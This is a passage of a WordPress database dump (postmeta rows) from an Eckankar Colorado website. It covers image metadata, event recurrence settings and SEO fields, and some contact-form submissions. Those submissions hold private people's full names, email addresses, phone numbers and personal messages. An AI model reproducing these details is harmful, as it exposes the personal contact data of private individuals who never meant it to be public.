),(128895,263459,'_EventEndDate','2021-02-08 16:00:00'),(152558,266155,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:34:\"2022/01/girl-smiling-on-hill-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"girl-smiling-on-hill-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152557,266155,'_wp_attached_file','2022/01/girl-smiling-on-hill-1.jpg'),(121231,263204,'smush-info','The file was compressed from 42.16 KB to 42.16 KB saving 0 percent using WP-Optimize'),(121233,263204,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:43172;s:12:\"smushed-size\";i:43172;s:15:\"savings-percent\";d:0;}'),(121232,263204,'smush-complete','1'),(121234,263213,'_field_97','Dave'),(121235,263213,'_field_98','Ogletree'),(121236,263213,'_field_99','dogle007@yahoo.com'),(121237,263213,'_field_100','(316) 806-2188'),(121238,263213,'_field_101','Co Springs'),(121239,263213,'_field_104','RESA'),(121240,263213,'_field_105','Is the RESA structure Org chart listed current?'),(121241,263213,'_form_id','10'),(121242,263213,'_seq_num','17'),(121243,263214,'_field_133','Jade'),(121244,263214,'_field_134','Beaty'),(121245,263214,'_field_135','jadebeaty2020@gmail.com'),(121246,263214,'_field_137','Book Donation?'),(121247,263214,'_field_138','Hi, there. I’m culling my library and would like to know if anyone would like older editions of Paul Twitchell’s writings. I’m in Fort Collins and am not finding an ECK Center here, but there seems to be one in Loveland. Can you tell me who to contact to see if anyone wants these? Much thanks.'),(121248,263214,'_form_id','13'),(121249,263214,'_seq_num','62'),(121250,263215,'_field_353','Nancy'),(121251,263215,'_field_354','Freibert'),(121252,263215,'_field_355','nannuba@gmail.com'),(121253,263215,'_field_357','Spiritual Lawson Life book discussion'),(121254,263215,'_field_358','Hello – I am interested in participating via phone on the spiritual laws of life book discussion!\n\nThank you very much,\nNancy \n\nc:303-241-7516'),(121255,263215,'_form_id','38'),(121256,263215,'_seq_num','3'),(125343,263324,'boldgrid_hide_page_title','0'),(125344,263324,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(26869,175618,'_wp_attached_file','2019/10/harold-klemp-smtabs.jpg'),(26870,175618,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:124;s:6:\"height\";i:161;s:4:\"file\";s:31:\"2019/10/harold-klemp-smtabs.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"harold-klemp-smtabs-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"harold-klemp-smtabs-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"harold-klemp-smtabs-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26553,128298,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(26554,128298,'_EventTimezoneAbbr','MDT'),(62890,248166,'_wp_attached_file','2020/01/loveland-center-location-sized.jpg'),(62891,248166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:361;s:6:\"height\";i:231;s:4:\"file\";s:42:\"2020/01/loveland-center-location-sized.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:40:\"loveland-center-location-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-250x160.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-281x180.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:42:\"loveland-center-location-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"C725UZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:12:\"-62169984000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.4\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62892,248166,'_wp_attachment_image_alt','Loveland ECK Center'),(62893,32074,'protect_children',''),(63578,248842,'_wp_attachment_image_alt','Hot air balloons flying over a mountain lake'),(62647,247926,'_wp_attachment_image_alt','Colorado Springs ECK Center'),(62645,247926,'_wp_attached_file','2020/01/co-springs-location-sized.jpg'),(62646,247926,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:361;s:6:\"height\";i:231;s:4:\"file\";s:37:\"2020/01/co-springs-location-sized.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"co-springs-location-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-250x160.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-281x180.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"co-springs-location-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62769,248046,'_wp_attachment_image_alt','ECK Temple of Colorado'),(62889,248165,'_wp_attachment_image_alt','Loveland ECK Center'),(63577,248842,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:380;s:6:\"height\";i:238;s:4:\"file\";s:35:\"2020/01/wslope-balloons-sized-3.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:33:\"wslope-balloons-sized-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-300x238.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:35:\"wslope-balloons-sized-3-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63019,32170,'protect_children',''),(64685,45842,'bgseo_title','Eckankar Activities in Colorado'),(64686,45842,'bgseo_description','Discover What Eckankar Offers In Your Community. Light and Sound Services, Advanced Spiritual Study, Meetups, Book Discussions and lots more!'),(64687,45842,'bgseo_custom_keyword','Eckankar activities in Colorado'),(64782,7162,'bgseo_title','About Us - Eckankar In Colorado'),(64783,7162,'bgseo_description','This website offers information on the ECKANKAR teachings and ECK activities throughout Colorado. These include introductory events, book discussions, ECK Light and Sound Services, regional seminars, classes, and a variety of of other events.'),(94743,261867,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2139;s:6:\"height\";i:1202;s:4:\"file\";s:35:\"2020/09/cosprings-area-splash-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"cosprings-area-splash-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"cosprings-area-splash-1-1024x575.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"cosprings-area-splash-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"cosprings-area-splash-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"cosprings-area-splash-1-1536x863.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:863;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:37:\"cosprings-area-splash-1-2048x1151.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"cosprings-area-splash-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94742,261867,'_wp_attached_file','2020/09/cosprings-area-splash-1.jpg'),(94741,261866,'_edit_last','2'),(94740,261866,'_edit_lock','1681922578:2'),(94739,261866,'protect_children',''),(116767,262872,'_EventEndDate','2021-02-07 12:45:00'),(116768,262872,'_EventEndDateUTC','2021-02-07 19:45:00'),(118897,262956,'_RTEClimitRegistrations','0'),(116769,262872,'_EventDuration','4500'),(118909,262956,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118907,262956,'_EventURL',''),(118908,262956,'_EventTimezone','America/Denver'),(118906,262956,'_EventCost',''),(118905,262956,'_EventCurrencyPosition','prefix'),(118904,262956,'_EventCurrencySymbol',''),(118903,262956,'_EventVenueID','262507'),(118901,262956,'_EventShowMapLink','1'),(118902,262956,'_EventShowMap','1'),(118892,262956,'_EventOrigin','events-calendar'),(118894,262956,'_RTECregistrationsDisabled','1'),(118895,262956,'_RTECdeadlineType','start'),(26838,173870,'_wp_attached_file','2019/10/activities-ELSS.jpg'),(26839,173870,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:27:\"2019/10/activities-ELSS.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"activities-ELSS-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"activities-ELSS-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"activities-ELSS-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657464\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26840,173871,'_wp_attached_file','2019/10/activities-Seminars-Workshops.jpg'),(26841,173871,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:234;s:6:\"height\";i:153;s:4:\"file\";s:41:\"2019/10/activities-Seminars-Workshops.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"activities-Seminars-Workshops-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:39:\"activities-Seminars-Workshops-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:41:\"activities-Seminars-Workshops-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26842,173872,'_wp_attached_file','2019/10/activities-Easy-Way.jpg'),(26843,173872,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:31:\"2019/10/activities-Easy-Way.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"activities-Easy-Way-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"activities-Easy-Way-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"activities-Easy-Way-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26844,173873,'_wp_attached_file','2019/10/activities-Meetups.jpg'),(26845,173873,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:230;s:6:\"height\";i:153;s:4:\"file\";s:30:\"2019/10/activities-Meetups.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"activities-Meetups-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"activities-Meetups-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"activities-Meetups-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26846,173873,'_wp_attachment_image_alt','ECK Meetups'),(27432,198737,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:323;s:6:\"height\";i:192;s:4:\"file\";s:32:\"2019/10/blue-books-butterfly.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"blue-books-butterfly-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-250x149.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-303x180.jpg\";s:5:\"width\";i:303;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"blue-books-butterfly-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27431,198737,'_wp_attached_file','2019/10/blue-books-butterfly.jpg'),(26850,173875,'_wp_attached_file','2019/10/activities-Youth-and-Family.jpg'),(26851,173875,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:230;s:6:\"height\";i:153;s:4:\"file\";s:39:\"2019/10/activities-Youth-and-Family.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"activities-Youth-and-Family-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"activities-Youth-and-Family-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"activities-Youth-and-Family-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26852,173875,'_wp_attachment_image_alt','ECK Youth and Family'),(26853,173876,'_wp_attached_file','2019/10/activities-Video-Discussions.jpg'),(26854,173876,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:40:\"2019/10/activities-Video-Discussions.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"activities-Video-Discussions-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:38:\"activities-Video-Discussions-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:40:\"activities-Video-Discussions-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26855,173876,'_wp_attachment_image_alt','ECK Video 